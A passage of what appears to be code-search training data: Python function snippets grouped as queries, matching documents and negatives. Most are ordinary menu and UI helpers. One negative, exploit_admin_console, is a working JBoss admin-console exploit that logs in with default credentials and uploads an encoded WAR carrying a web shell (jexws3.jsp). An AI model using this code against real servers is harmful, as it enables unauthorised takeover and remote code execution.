"def open_menu_section(self, url):\n if url == ADMIN_USERS:\n self.click_on_element_by_css(adpl.DASHBOARD_USERS)\n elif url == ADMIN_USERS_STATUSES:\n self.click_on_element_by_css(adpl.DASHBOARD_USERS_STATUSES)\n elif url == ADMIN_ROLE_REQUESTS:\n self.click_on_element_by_css(adpl.DASHBOARD_ROLE_REQUESTS)\n elif url == ADMIN_LOGS:\n self.click_on_element_by_css(adpl.DASHBOARD_LOGS)\n self.wait.until(base_page.EC.url_to_be(url))",
"def change_menu_of_dashboard_to(self, url):\n self.open_admin_side_menu()\n if url == ADMIN_USERS:\n self.click_on_element_by_css(adpl.MANAGE_USERS_SIDE_MENU)\n elif url == ADMIN_USERS_STATUSES:\n self.click_on_element_by_css(adpl.USERS_STATUSES_SIDE_MENU)\n elif url == ADMIN_ROLE_REQUESTS:\n self.click_on_element_by_css(adpl.ROLE_REQUESTS_SIDE_MENU)\n elif url == ADMIN_LOGS:\n self.click_on_element_by_css(adpl.LOGS_SIDE_MENU)\n self.wait.until(base_page.EC.url_to_be(url))",
"def main_menu(self) -> None:\n logger.info(\"logged in as GP\")\n while True:\n Parser.print_clean(\"You're currently viewing main menu options for GP {}.\".format(self.username))\n self.print_information()\n option_selection = Parser.selection_parser(\n options={\"A\": \"View/Edit availability\", \"M\": \"Manage bookings\", \"V\": \"View/Start appointment\",\n \"U\": \"update your profile\", \"--logout\": \"Logout\"})\n\n if option_selection == \"--logout\":\n # Quitting is required for logout to ensure all personal data is cleared from session\n logger.info(\"User Logged Out\")\n Parser.print_clean(\"Logging you out...\")\n Parser.user_quit()\n\n elif option_selection == \"A\":\n self.edit_availability()\n elif option_selection == \"M\":\n self.manage_bookings()\n elif option_selection == \"V\":\n self.view_appointment()\n elif option_selection == \"U\":\n self.edit_information()",
"def account_admin_menu(request):\n NAV_MENU = {\n \"100\": {\n \"name\": \"Switch User\",\n \"reversible\": \"userware_switch_on\",\n \"url\": \"\",\n \"pre_login_visible\": False,\n \"post_login_visible\": True,\n \"superuser_required\": False,\n \"staff_required\": True,\n \"icon\": \"icon-group\",\n 'sub_menu': None,\n },\n \"200\": {\n \"name\": \"Database Backend\",\n \"reversible\": \"admin:index\",\n \"url\": \"\",\n \"pre_login_visible\": False,\n \"post_login_visible\": True,\n \"superuser_required\": False, # superuser should be set as staff as well \n \"staff_required\": True,\n \"icon\": \"icon-tasks\",\n 'sub_menu': None,\n },\n }\n\n return build_menu(request, NAV_MENU)",
"def show_main_menu(self):\n\n # Display a welcome message\n print(\"\"\" \n ___ \n /'___\\ \n /\\ \\__/ __ ___ ___ \n \\ \\ ,__\\/'__`\\ /' __` __`\\ \n \\ \\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\/\\ \\ \n \\ \\_\\\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\\\\n \\/_/ \\/__/\\/_/\\/_/\\/_/\\/_/ \n \"\"\")\n\n # Prompt user to register, login, or exit the F.A.M until they choose a valid option.\n while True:\n print(\"\\n Family Appointed Moderator\")\n print(\"----------------------------------------\")\n print(\n \"1 - Register new user\\n\"\n \"2 - Login\\n\"\n \"3 - Exit\\n\"\n )\n\n try:\n choice = int(input(\"Enter your choice: \"))\n except ValueError:\n print(\"\\nInvalid choice. Please try again.\")\n continue\n\n if choice == 3:\n return\n elif choice > 3 or choice < 0:\n print(\"\\nInvalid choice. Please try again.\")\n else:\n input_map = {\n 1: self._register_user,\n 2: self._login_user,\n }\n\n # Catch any string values\n try:\n operation = input_map[choice]\n except ValueError:\n print(\"Invalid choice. Please try again.\")\n continue\n\n # Move to the actions menu after a user is logged in or registered\n if operation():\n try:\n self._show_actions_menu()\n except UserIsLockedError as e:\n print(e)",
"def admin_session(c_list, a_list):\n id_location = login(a_list)\n if id_location == -1:\n return\n else:\n while True:\n what_to_do = int(\n input('Enter 1 to show class roster, 2 to change max class size, 0 to exit: '))\n if what_to_do == 1:\n a_list[id_location].show_roster(c_list)\n elif what_to_do == 2:\n a_list[id_location].change_max_size(c_list)\n else:\n return",
"def _show_actions_menu(self):\n while True:\n # Check if a user is locked, if so exit out of the actions menu\n if self.current_user.can_lock_account():\n raise UserIsLockedError(\"Your account is locked. We have logged you out\")\n\n print(f\"\\nLogged in as {self.current_user.name}\\n\")\n\n # options:\n print(\"Actions menu:\\n\"\n \"----------------\\n\"\n \"1 - View budgets\\n\"\n \"2 - Record transaction\\n\"\n \"3 - View transactions by budget\\n\"\n \"4 - View bank account details\\n\"\n \"5 - Logout\\n\"\n )\n\n try:\n option = int(input(\"Please enter the number your selection: \"))\n except ValueError:\n print(\"Invalid choice. Please try again.\")\n continue\n # option 5 = LOGOUT, back to main menu\n if option == 5:\n return\n else:\n # performs the action selected by the user.\n self._perform_action(option)",
"def verify_admin_menu(self):\n admin_id = get_param('What is your admin ID?', self.screen)\n password = get_param('What is your password?', self.screen)\n\n admin = verify_admin(admin_id, password)\n\n if admin:\n self.screen.clear()\n self.screen.border(0)\n self.screen.addstr(12, 40, 'Logged in successfully as admin.')\n self.screen.addstr(13, 40, 'Press any key to continue.')\n self.screen.refresh()\n\n pause = chr(self.screen.getch())\n self.admin_menu()\n else:\n self.screen.clear()\n self.screen.border(0)\n self.screen.addstr(12, 40, 'Admin login failed.')\n self.screen.addstr(13, 40, 'Press any key to continue.')\n self.screen.refresh()\n\n pause = chr(self.screen.getch())\n self.unlogged_in_menu()",
"def open_admin_side_menu(self):\n self.click_on_element_by_css(adpl.ADMIN_SIDE_NAVIGATION_MENU)",
"def click_account(self):\n self.find_element_by_xpath(self.profile_menu_xpath).click()\n element = WebDriverWait(self.driver, 30).until(EC.element_to_be_clickable((By.XPATH, self.account_btn_xpath)))\n did_scroll = element.location_once_scrolled_into_view\n element.click()",
"def test_get_user_level_access(self):\n pass",
"def user(ctx):\n pass",
"def exploit_admin_console(url):\n # Use default password for Jboss 5 and 6\n username = \"admin\"\n password = \"admin\"\n headers = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Connection\": \"keep-alive\",\n \"User-Agent\": user_agents[randint(0, len(user_agents) - 1)]}\n\n r = pool.request('GET', url+\"/admin-console/login.seam\", headers=headers)\n cookie = r.getheader('set-cookie').split(\";\")[0]\n headers['Cookie'] = cookie\n state = get_viewstat_admin_console(r.data)\n #payload = (\"login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login\"\n # \"&javax.faces.ViewState=%s\" % (username, password, state))\n payload = \"login_form=login_form&login_form%3Aname=\"+username+\"&login_form%3Apassword=\"+password+\"&login_form%3Asubmit=Login&javax.faces.ViewState=\"+url_encode(state)\n headers['Content-Type'] = \"application/x-www-form-urlencoded\"\n print(GREEN + \"\\n * Info: Trying to perform authentication with default credentials...\" +ENDC)\n r = pool.request('POST', url+\"/admin-console/login.seam\", body=payload, headers=headers, redirect=False)\n state = get_viewstat_admin_console(r.data)\n if r.status == 302:\n print(GREEN + \" * Info: Successfully logged in! Wait...\" + ENDC)\n location = r.getheader('Location')\n conversation_id = location.split('=')[1]\n r = pool.request('GET', location, headers=headers)\n if state == None:\n sleep(7)\n r = pool.request('GET', url+\"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR\"\n \"%29&conversationId=\"+conversation_id+\"&conversationPropagation=end\", headers=headers)\n conversation_id = str(int(conversation_id)+1)\n r = pool.request('GET', url+\"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType\"\n \"Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId=\"\n + conversation_id, headers=headers)\n state = get_viewstat_admin_console(r.data)\n\n headers['Content-Type'] = \"multipart/form-data; boundary=---------------------------8994251555011888521050172030\"\n\n payload = (\"\\x50\\x4b\\x03\\x04\\x14\\x00\\x08\\x08\\x08\\x00\\x6d\\x7c\\x98\\x48\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x04\\x00\\x4d\\x45\\x54\\x41\\x2d\\x49\\x4e\"\n \"\\x46\\x2f\\xfe\\xca\\x00\\x00\\x03\\x00\\x50\\x4b\\x07\\x08\\x00\\x00\\x00\\x00\\x02\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x50\\x4b\\x03\\x04\\x14\\x00\\x08\\x08\\x08\\x00\\x6d\\x7c\\x98\\x48\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x4d\\x45\\x54\"\n \"\\x41\\x2d\\x49\\x4e\\x46\\x2f\\x4d\\x41\\x4e\\x49\\x46\\x45\\x53\\x54\\x2e\\x4d\\x46\\xf3\\x4d\"\n \"\\xcc\\xcb\\x4c\\x4b\\x2d\\x2e\\xd1\\x0d\\x4b\\x2d\\x2a\\xce\\xcc\\xcf\\xb3\\x52\\x30\\xd4\\x33\"\n \"\\xe0\\xe5\\x72\\x2e\\x4a\\x4d\\x2c\\x49\\x4d\\xd1\\x75\\xaa\\x04\\x09\\x58\\xe8\\x19\\xc4\\x9b\"\n \"\\x9b\\x2b\\x68\\xf8\\x17\\x25\\x26\\xe7\\xa4\\x2a\\x38\\xe7\\x17\\x15\\xe4\\x17\\x25\\x96\\x00\"\n \"\\x95\\x6b\\xf2\\x72\\xf1\\x72\\x01\\x00\\x50\\x4b\\x07\\x08\\x05\\xa0\\x0e\\xbc\\x43\\x00\\x00\"\n \"\\x00\\x44\\x00\\x00\\x00\\x50\\x4b\\x03\\x04\\x14\\x00\\x08\\x08\\x08\\x00\\x68\\x7c\\x98\\x48\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x6a\\x65\\x78\"\n \"\\x77\\x73\\x33\\x2e\\x6a\\x73\\x70\\x95\\x55\\x5f\\x6f\\x1a\\x39\\x10\\x7f\\xbf\\x4f\\x31\\xb1\"\n \"\\x94\\xca\\x94\\xb2\\xb4\\xba\\x97\\x53\\x08\\xd1\\xa5\\xb9\\x54\\x69\\x14\\xe9\\x22\\x52\\xae\"\n \"\\x0f\\xa7\\xaa\\x32\\xbb\\x03\\xeb\\x74\\xd7\\xf6\\xd9\\xb3\\x05\\x94\\xf2\\xdd\\x6f\\xec\\x05\"\n \"\\x02\\x85\\x6b\\x75\\x2f\\xbb\\xc6\\x33\\x9e\\x9d\\xf9\\xfd\\x31\\xe7\\xa7\\xbf\\x83\\x53\\x33\"\n \"\\x04\\x5d\\x3b\\xeb\\x69\\x28\\x1e\\xd5\\x57\\x95\\x35\\xa4\\xab\\xec\\xe5\\xab\\xb4\\xd6\\x96\"\n \"\\x57\\x90\\x96\\x06\\x29\\x7b\\x29\\x52\\xfe\\xb5\\xc9\\x6d\\xa1\\xcd\\x6c\\x28\\xc6\\x1f\\xde\"\n \"\\xf5\\x7e\\x13\\xa7\\x17\\x70\\xee\\x3c\\xf2\\xf3\\x14\\xb4\\x21\\xf8\\x8a\\x3e\\x68\\x6b\\x60\"\n \"\\x08\\xbf\\x0e\\x40\\x4f\\x41\\x7a\\xfc\\xa7\\xc1\\x40\\xd9\\x0c\\xe9\\x5e\\x79\\x55\\x23\\xa1\"\n \"\\x97\\xc2\\x39\\x27\\x3a\\x70\\x32\\x04\\xd3\\x54\\x55\\x07\\x9e\\x60\\x62\\x6d\\x85\\xca\\x40\"\n \"\\x5e\\x62\\xfe\\x65\\xec\\x0a\\x45\\x18\\x06\\x70\\x43\\xe4\\xc6\\xa3\\xbb\\x2b\\x6b\\x0c\\xe6\"\n \"\\x14\\xeb\\xe6\\xbc\\xbc\\xda\\xc9\\x81\\xb6\\xc4\\x00\\xde\\x36\\xd3\\x29\\x7a\\x2c\\x46\\xa8\"\n \"\\x0a\\xf4\\x30\\xf1\\xdb\\x88\\xc7\\xe0\\xac\\x09\\x98\\x05\\x24\\xae\\x44\\x68\\xe8\\xc3\\xd2\"\n \"\\xa1\\x14\\x84\\x0b\\xea\\x97\\x54\\x57\\xa2\\x73\\xd0\\xeb\\x4d\\x2a\\x23\\x45\\xea\\xa7\\xd7\"\n \"\\xb4\\x1f\\x7b\\x6e\\x19\\x5e\\xbc\\x80\\x9f\\x67\\x67\\x9c\\xa1\\xaa\\x20\\xc5\\x94\\x9f\\x28\"\n \"\\x3a\\x9d\\xa7\\xbd\\xf9\\xb8\\xc3\\x14\\x18\\xc0\\x0a\\xf9\\x05\\x07\\x51\\xf2\\x0d\\x07\\x8f\"\n \"\\x8c\\x2c\\x0f\\x80\\xe9\\x80\\xc1\\x39\\xf0\\x96\\x14\\x25\\xc7\\xce\\xfa\\xfd\\x39\\x4e\\x42\"\n \"\\x89\\x55\\x95\\x3d\\xe2\\x62\\x62\\x43\\x88\\x2c\\xf6\\x1f\\x83\\xfb\\xbc\\xa6\\x28\\xa3\\x05\"\n \"\\x71\\x8b\\xd6\\xa1\\x79\\x2e\\x23\\x19\\x89\\x15\\x3c\\x90\\x67\\x8a\\x21\\x94\\xfc\\xa9\\x1f\"\n \"\\xf0\\x37\\xd8\\x24\\x56\\x2a\\xd0\\x8d\\x6d\\x7c\\xea\\x32\\xb6\\x17\\x7b\\xf9\\x83\\x7b\\x95\"\n \"\\x9d\\x8c\\x6c\\x9b\\xc4\\xcb\\xe0\\x2a\\x4d\\x52\\x9c\\x89\\xce\\xdf\\xaf\\x3f\\x75\\x45\\x99\"\n \"\\x55\\x76\\xc6\\x1d\\x78\\x74\\x95\\xca\\xf1\\xb2\\xaa\\xa4\\x00\\xf1\\x0a\\x44\\x2f\\x96\\x26\"\n \"\\xbf\\x7c\\x4a\\xa4\\xec\\x63\\xd2\\x82\\x12\\x81\\xfc\\x0e\\x95\\xc8\\xee\\xa8\\xed\\xf5\\xde\"\n \"\\xf3\\x50\\x9e\\x96\\x52\\x8c\\x03\\xfa\\xde\\xe5\\x8c\\x19\\xe7\\xba\\x47\\xf8\\xba\\xb1\\x81\"\n \"\\x31\\xe8\\x8a\\xf3\\x9e\\xe8\\xee\\x84\\x47\\x58\\x5b\\xc2\\xcb\\xa2\\xf0\\xb2\\xb3\\x96\\xc6\"\n \"\\x49\\x1c\\xe9\\x9d\\xae\\x70\\x4d\\xf2\\x67\\xd1\\xdd\\x9b\\x9a\\xb9\\x5e\\xe8\\x40\\x41\\x46\"\n \"\\x92\\xef\\x79\\x60\\xfa\\xe8\\x35\\x43\\x05\\xf3\\xf6\\x35\\x4c\\xfc\\xec\\x04\\xfe\\xab\\xce\"\n \"\\x60\\x7d\\x22\\xcb\\x2b\\x1b\\x30\\xf2\\x31\\xd9\\x9c\\xde\\x97\\x78\\x02\\xf9\\xbd\\x71\\x0d\"\n \"\\x31\\xc0\\xa8\\xea\\xf5\\xee\\x01\\x2e\\x3c\\xcf\\x4e\\x16\\xf7\\x17\\x27\\x62\\xa7\\xc6\\xcf\"\n \"\\xfe\\xb5\\x75\\xeb\\x7b\\xf6\\xc5\\x8c\\xbf\\xea\\x94\\x0f\\xc8\\x3f\\xe4\\xc4\\x33\\x31\\xaa\"\n \"\\xb8\\xd3\\x06\\x9f\\xa9\\x03\\xa6\\xee\\xcd\\xa7\\x35\\x24\\xbb\\x05\\x2e\\x36\\xc6\\xe7\\xe9\"\n \"\\x6d\\x43\\x99\\x8b\\x83\\x4a\\x71\\xcf\\x9e\\x66\\x61\\x1b\\x46\\xf3\\x0c\\xa8\\xe4\\xe6\\x41\"\n \"\\x07\\x60\\x9b\\xb7\\x16\\x01\\xb2\\x70\\x8b\\x8b\\xb7\\xac\\x4e\\xb8\\x7d\\xb8\\x87\\x8f\\x1b\"\n \"\\xc9\\xf2\\x8a\\xe9\\xca\\x6d\\x5d\\xa3\\x29\\xf8\\xa0\\x22\\x58\\xda\\x86\\xb7\\x7c\\x63\\x62\"\n \"\\x9d\\xed\\x29\\x2e\\xc0\\x80\\xb0\\x80\\xec\\x32\\xed\\x47\\x4c\\x36\\x57\\x90\\x9d\\xc2\\xc6\"\n \"\\x03\\x3c\\x30\\xdc\\xa6\\x03\\x2c\\x08\\x8e\\x03\\x03\\x43\\x58\\x64\\x22\\xc9\\x7d\\x05\\xc9\"\n \"\\x7e\\x71\\xa6\\x50\\x66\\x0c\\x20\\x29\\x6d\\xd8\\xb5\\xba\\x60\\xc3\\x7f\\xfb\\x06\\xfb\\x9b\"\n \"\\x8e\\xd7\\x53\\xcd\\xc2\\x8d\\xd7\\xd6\\x4f\\xd1\\x6e\\xeb\\xaf\\x20\\x57\\x94\\x97\\xf2\\x7a\"\n \"\\x91\\xa3\\x4b\\xf7\\x18\\x4b\\x78\\x8b\\x53\\x65\\xa4\\xb8\\xf6\\xde\\xfa\\xd6\\xff\\xd1\\x51\"\n \"\\x53\\xfe\\xb1\\xbd\\x46\\x06\\xab\\xe8\\x06\\x88\\xba\\xb2\\x39\\xf2\\x10\\xae\\x25\\xe0\\x61\"\n \"\\xc9\\x43\\xd4\\xc9\\x99\\x5b\\xc5\\x5b\\xf6\\x39\\x9b\\x54\\x44\\xe3\\xdd\\xd9\\x39\\xfa\\x2b\"\n \"\\x15\\x55\\x94\\x69\\x53\\xe0\\xe2\\xcf\\xa9\\x14\\x73\\x6d\\x78\\xaa\\x0b\\x78\\x1d\\x27\\x3b\"\n \"\\x39\\x56\\x62\\xca\\x2a\\x67\\x37\\xb1\\x12\\x14\\x59\\xbf\\x73\\x8b\\xf5\\xd3\\x0d\\xe6\\x58\"\n \"\\x2d\\xa3\\xc6\\x90\\xae\\x31\\x79\\xa5\\x5d\\xca\\x68\\x00\\xcc\\x59\\xd5\\x75\\x11\\x57\\xd0\"\n \"\\xbf\\x02\\xd1\\x0d\\x65\\x02\\x60\\x7d\\xbb\\xfd\\xf8\\xe4\\x3a\\xf7\\xff\\xa9\\xdd\\x1d\\x95\"\n \"\\xf7\\xfa\\x5a\\x2a\\x74\\x88\\xc5\\xf6\\x94\\xcc\\xf6\\x2a\\x79\\x3e\\x90\\x29\\xb8\\xf3\\x07\"\n \"\\xb4\\xcb\\x46\\x8c\\x71\\xe6\\xf1\\xf3\\xcc\\xe6\\x21\\x99\\xdf\\x15\\x10\\x63\\xf3\\xc5\\xd8\"\n \"\\x79\\xfc\\xbb\\xaa\\x6b\\x65\\x9e\\x85\\x76\\x7a\\xf1\\xcb\\xbf\\x50\\x4b\\x07\\x08\\x25\\x39\"\n \"\\x60\\x50\\x70\\x03\\x00\\x00\\x7a\\x07\\x00\\x00\\x50\\x4b\\x01\\x02\\x14\\x00\\x14\\x00\\x08\"\n \"\\x08\\x08\\x00\\x6d\\x7c\\x98\\x48\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x09\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x4d\"\n \"\\x45\\x54\\x41\\x2d\\x49\\x4e\\x46\\x2f\\xfe\\xca\\x00\\x00\\x50\\x4b\\x01\\x02\\x14\\x00\\x14\"\n \"\\x00\\x08\\x08\\x08\\x00\\x6d\\x7c\\x98\\x48\\x05\\xa0\\x0e\\xbc\\x43\\x00\\x00\\x00\\x44\\x00\"\n \"\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3d\\x00\\x00\"\n \"\\x00\\x4d\\x45\\x54\\x41\\x2d\\x49\\x4e\\x46\\x2f\\x4d\\x41\\x4e\\x49\\x46\\x45\\x53\\x54\\x2e\"\n \"\\x4d\\x46\\x50\\x4b\\x01\\x02\\x14\\x00\\x14\\x00\\x08\\x08\\x08\\x00\\x68\\x7c\\x98\\x48\\x25\"\n \"\\x39\\x60\\x50\\x70\\x03\\x00\\x00\\x7a\\x07\\x00\\x00\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\xc2\\x00\\x00\\x00\\x6a\\x65\\x78\\x77\\x73\\x33\\x2e\\x6a\\x73\"\n \"\\x70\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00\\x03\\x00\\x03\\x00\\xb5\\x00\\x00\\x00\\x6a\\x04\"\n \"\\x00\\x00\\x00\\x00\")\n\n data = get_boundary_admin_console(jboss_version=6, state=state, payload=payload)\n try:\n r = pool.request('POST', url + \"/admin-console/secure/resourceContentCreate.seam\", headers=headers,body=data)\n if r.status != 302:\n data = get_boundary_admin_console(jboss_version=5, state=state, payload=payload)\n r = pool.request('POST', url + \"/admin-console/secure/resourceContentCreate.seam\", headers=headers, body=data)\n except:\n sleep(1)\n\n return get_successfully(url, \"/jexws3/jexws3.jsp\")\n\n else:\n print(RED + \"\\n * Authentication failed!\" + ENDC)\n return 404",
"def show_privileges(self):\n print(\"Here is the privileges of an administrator: \")\n for privilege in self.privileges:\n print(\"- \" + privilege.title())",
"def getPageManagedUser(self):\n self.driver.get(MANAGED_USER)",
"def click_logout(self):\n self.find_element_by_xpath(self.profile_menu_xpath).click()\n logout_btn_element = WebDriverWait(self.driver, 30).until(\n EC.element_to_be_clickable((By.XPATH, self.logout_btn_xpath)))\n logout_btn_element.click()",
"def admin_users():\n users = User.select()\n return render_template('users.html', users=users)",
"def displayLogin(self):\n self.l1.setVisible(False)\n self.l2.setVisible(False)\n self.l3.setVisible(False)\n self.logl1.setVisible(True)\n self.adminl1.setVisible(False)\n\n self.adminUsername.setVisible(True)\n self.adminPassword.setVisible(True)\n self.log.setVisible(True)\n\n self.lRecharge.setVisible(False)\n self.bRecharge.setVisible(False)\n self.moneyBox.setVisible(False)\n\n self.username.setVisible(False)\n self.name.setVisible(False)\n self.surname.setVisible(False)\n self.bCreateAccount.setVisible(False)\n\n self.lAddDevice.setVisible(False)\n self.username2.setVisible(False)\n self.bAddDevice.setVisible(False)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Retrieves all the synonym names of a data collection (this list includes the original name).
|
def getDataTypeSynonyms(self, name):
res = self.serv.getDataTypeSynonyms(name)
return res
|
[
"def synonyms(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:\n return pulumi.get(self, \"synonyms\")",
"def _get_pubchem_synonyms(self):\n syn_list = []\n url = PUBCHEM_SYNONYMS_PATH % self._get_cid()\n try:\n response = requests.get(url)\n except requests.exceptions.HTTPError:\n return None\n pc_dict = json.loads(response.content)\n for item in pc_dict['Record']['Information']:\n try:\n syn_list = item['StringValueList']\n except:\n continue\n return syn_list",
"def find_synonyms(item):\n url = parse_url_for_request(item)\n try:\n synonym = get_jsonparsed_data(url)['synsets'][0]['terms']\n results = []\n for i in range(len(synonym)):\n results.append(synonym[i]['term'])\n except IndexError:\n results = []\n return results",
"def synonyms(word_tag):\n _type = TPU.tag_type(word_tag[1])\n root = wordnet.morphy(word_tag[0])\n if not root:\n root = word_tag[0]\n\n _result = set()\n _result.add(root)\n if _type:\n syn_sets = wordnet.synsets(root, pos=_type)\n for syn_set in syn_sets:\n syn = syn_set.name().split('.')[0]\n if not '_' in syn:\n _result.add(syn)\n return list(_result)",
"def all_synonyms(tagged_sentences):\n _result = []\n for sent in tagged_sentences:\n for word in sent:\n _result.append(TPU.synonyms(word))\n return _result",
"def get_wordnet_syns(word):\n synonyms = []\n regex = r\"_\"\n pat = re.compile(regex)\n synset = nltk.wordnet.wordnet.synsets(word)\n for ss in synset:\n for swords in ss.lemma_names:\n synonyms.append(pat.sub(\" \", swords.lower()))\n synonyms = f7(synonyms)\n return synonyms",
"def synonyms(self, defnNum=0, allowEmpty=True, **filters):\n\n data = self._filter(mode='syn', defnNum=defnNum, filters=filters)\n\n # the word does not exist. return empty.\n if not data:\n return []\n \n if allowEmpty:\n return data\n else:\n return [d for d in data if len(d) > 0]",
"def getSchemataNames(self):\n lst = []\n for f in self.fields():\n if not f.schemata in lst:\n lst.append(f.schemata)\n return lst",
"def find_synonyms(word):\n synonyms = [' '.join(syn_name.split('_')) for syn in wordnet.synsets(word.lower()) for syn_name in syn.lemma_names()\n if syn_name.lower() != word.lower() and\n len(syn_name.split('_')) == 1 and\n lemmatizer.lemmatize(syn_name) != lemmatizer.lemmatize(word.lower()) and\n nltk.pos_tag([syn_name])[0][1] == nltk.pos_tag([word.lower()])[0][1]\n ]\n return synonyms",
"def get_data_name_list(self):\n return self._data_name_list",
"def get_synonyms(syns_entry):\n synonyms = []\n for synonym in syns_entry:\n match = re.match(r'^\\\"(.+)\\\" (EXACT|RELATED|NARROW|BROAD)',\n synonym)\n syn, status = match.groups()\n if status in allowed_synonyms:\n synonyms.append(syn)\n return synonyms",
"def get_all_names(self):\n all_names = set()\n \n return all_names\n\n # Might be helpful... I know nothing about nginx lens",
"def names(self):\n\t\treturn self.store().names()",
"def names(self, namespace=None):\n current_namespace = self.namespace\n if namespace is None:\n namespace = self.namespace\n\n names = []\n if namespace == \"all\":\n # FOR EACH NAMESPACE, ADD THE NAME OBJECTS TO THE LIST OF NAMES\n for namespace in self.namespaces():\n self.namespace = namespace\n names.extend([x[\"name\"] for x in self.metadata(output=\"list\")])\n else:\n # RETURN ALL THE NAMES AND OBJECT_IDS IN THAT NAMESPACE ONLY\n names = [\n x[\"name\"]\n for x in self.metadata(output=\"list\")\n if x[\"namespace\"] == self.namespace\n ]\n\n self.namespace = current_namespace\n return names",
"def optGetSynonym(*args):\n return _optcc.optGetSynonym(*args)",
"def synonyms(self, term):\n try:\n obj = self._cm[term]\n it = self._cm.synonyms(obj)\n except KeyError:\n try:\n obj = self._qm[term]\n it = self._qm.synonyms(obj)\n except KeyError:\n try:\n obj = self._fm[term]\n it = self._fm.synonyms(obj)\n except KeyError:\n it = ()\n for k in it:\n yield k",
"def getSNPSetsList() :\n\timport rabaDB.filters as rfilt\n\tf = rfilt.RabaQuery(SNPMaster)\n\tnames = []\n\tfor g in f.iterRun() :\n\t\tnames.append(g.setName)\n\treturn names",
"def get_datacenters_names_list():\n return [cl.get_name() for cl in get_datacenters_list()]",
"def _words_from_synset(synset):\n words = set()\n\n # We add the words from the synset...\n for lemma_name in synset.lemma_names():\n words.add(lemma_name)\n\n return words"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Retrieves the physical location (URL) of a web page providing knowledge about a specific entity, using a specific resource.
|
def getLocation(self, uri, resource):
res = self.serv.getLocation(uri, resource)
return res
|
[
"def get_url_page(self, product):\n return product.get('url')",
"def url_for(self, path_or_page):\n\n if isinstance(path_or_page, Page):\n return self.relpath(self._absolute_path(path_or_page.path), is_page=True)\n else:\n return self.relpath(path_or_page)",
"def page_url(self, page_pk): \n self.c.execute(\"SELECT url FROM pages WHERE id=%s\", (page_pk,))\n return self.c.fetchone()[0]",
"def get_page_url(self):\n mission_part = 'mission=' + self.mission\n id_num = self.image_id.split('-')[2]\n id_part = 'roll=E&frame=' + id_num\n page_url = infopage + mission_part + '&' + id_part\n return page_url",
"def get_external_url():",
"def resource_location(self):\n if \"resourceLocation\" in self._prop_dict:\n return self._prop_dict[\"resourceLocation\"]\n else:\n return None",
"def object_url(self, obj):\n\n return resource_url(obj, self.request)",
"def get_uri(self, request):",
"def _get_lti_view_url(self, resource):\n return f\"/lti/documents/{resource.pk}\"",
"def url(self):\n if self.slug:\n return self.slug\n return url_for('page_view',page_id=self.id)",
"def get_resource(self):\n\n return urllib2.urlopen(self.endpoint)",
"def entity_url_path(baseuri, entityref):\n uri = urljoin(baseuri, entityref)\n return urlparse(uri).path",
"def get_absolute_url(self):\r\n return self.content_object.get_absolute_url()",
"def url(entity):\n return '{ch_base}{ch_ver}{ch_entity}?token={ch_token}'.format(ch_base=CH_BASE,\n ch_ver=CH_API_VER,\n ch_entity=entity,\n ch_token=CH_TOKEN)",
"def homepage_url(self):\n return self.request.link(self.app.org)",
"def _getURL(self):\n return \"http://%s.%s\" % (self.key, self.baseurl)",
"def get_url(self, instance):\n return instance.url if not instance.is_self else None",
"def item_url(self):\n return self.get_url(item=True)",
"def get_linked_resource(self, resource, rel, media_type): # NOQA\n return self.get_resource(find_link(resource, rel, media_type).href)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Retrieves some information about these Web Services.
|
def getServicesInfo(self):
res = self.serv.getServicesInfo()
return res
|
[
"def get_services(self):\n xpath = [\"Services\", \"Service\"]\n return self.find_anywhere(xpath)",
"def services(self):\n _log.debug('get service list')\n result = self._requestJSON('services', '')\n return self._getKey(result, 'name')",
"def get_service_info(self):\n res = self.api_client.GetServiceInfo()\n return res.response().result",
"def getServicesList( self ):\n\n res = self.rsS.getServicesList()\n if not res[ 'OK' ]:\n raise RSSException, where( self, self.getServicesList ) + \" \" + res[ 'Message' ]\n\n return res",
"def services(self):\n return self.__services",
